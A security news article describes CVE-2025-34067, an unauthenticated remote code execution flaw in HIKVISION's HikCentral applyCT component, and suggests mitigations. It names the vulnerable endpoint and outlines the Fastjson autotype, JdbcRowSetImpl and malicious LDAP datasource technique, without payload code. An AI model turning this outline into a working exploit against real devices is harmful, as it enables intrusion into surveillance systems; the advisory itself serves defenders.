Critical HIKVISION ApplyCT Vulnerability Exposes Devices to Code Execution Attacks

A critical security vulnerability has been discovered in HIKVISION’s applyCT component, part of the HikCentral Integrated Security Management Platform, that allows attackers to execute arbitrary code remotely without authentication. 

Assigned CVE-2025-34067 with a maximum CVSS score of 10.0, this vulnerability stems from the platform’s use of a vulnerable version of the Fastjson library, exposing millions of surveillance devices worldwide to potential compromise.

Key Takeaways
1. CVE-2025-34067 (CVSS 10.0) in HIKVISION applyCT allows unauthenticated remote code execution.
2. Exploits Fastjson library via malicious JSON to /bic/ssoService/v1/applyCT endpoint using LDAP connections.
3. Affects HikCentral surveillance platforms across government, commercial, and industrial sectors globally.
4. Assess deployments immediately, restrict network access, and contact HIKVISION for patches - actively exploited.

Critical Fastjson Deserialization Flaw

The vulnerability exploits the /bic/ssoService/v1/applyCT endpoint through malicious JSON payloads processed by the Fastjson library. 

Attackers can craft specific JSON requests that trigger Fastjson’s auto-type feature, enabling the loading of arbitrary Java classes. 

The attack mechanism involves manipulating the JdbcRowSetImpl class to establish connections with untrusted LDAP servers, effectively bypassing security controls.

The exploit requires sending a POST request with Content-Type: application/json to the vulnerable endpoint. By manipulating the datasource parameter to point to a malicious LDAP server, attackers can achieve remote code execution on the underlying system.

This represents a classic case of CWE-502 Deserialization of Untrusted Data combined with CWE-917 Expression Language Injection, where insufficient input validation allows unauthorized class loading and code execution.

The vulnerability affects the HikCentral platform, formerly known as the “Integrated Security Management Platform,” which serves as a comprehensive security management solution widely deployed across government, commercial, and industrial sectors. 

The platform’s extensive adoption makes this vulnerability particularly concerning, as it provides centralized control over multiple security devices and surveillance systems.

Potential consequences include unauthorized access to sensitive surveillance data, manipulation of security systems, and the possibility of lateral movement within network infrastructure. 

Organizations using affected HIKVISION applyCT systems face risks of data breaches, service disruptions, and potential compromise of their entire security infrastructure.

The vulnerability’s unauthenticated nature means attackers can exploit it without requiring valid credentials, significantly lowering the barrier to entry for malicious actors. 

This has led to its classification as a known-exploited-vulnerability, indicating active exploitation in the wild.

Mitigations

Organizations should immediately assess their HIKVISION applyCT deployments and implement network segmentation to limit exposure. 

Monitoring for unusual network traffic to the /bic/ssoService/v1/applyCT endpoint can help detect attempts at exploitation. 

While specific patches have not been detailed in current advisories, users should contact HIKVISION support for immediate remediation guidance and consider temporarily restricting access to the vulnerable endpoint until patches are available.

Security teams should also implement additional monitoring for LDAP connection attempts from their HIKVISION systems and consider deploying network-based intrusion detection systems to identify potential exploitation attempts targeting this critical vulnerability.

Investigate live malware behavior, trace every step of an attack, and make faster, smarter security decisions -> Try ANY.RUN now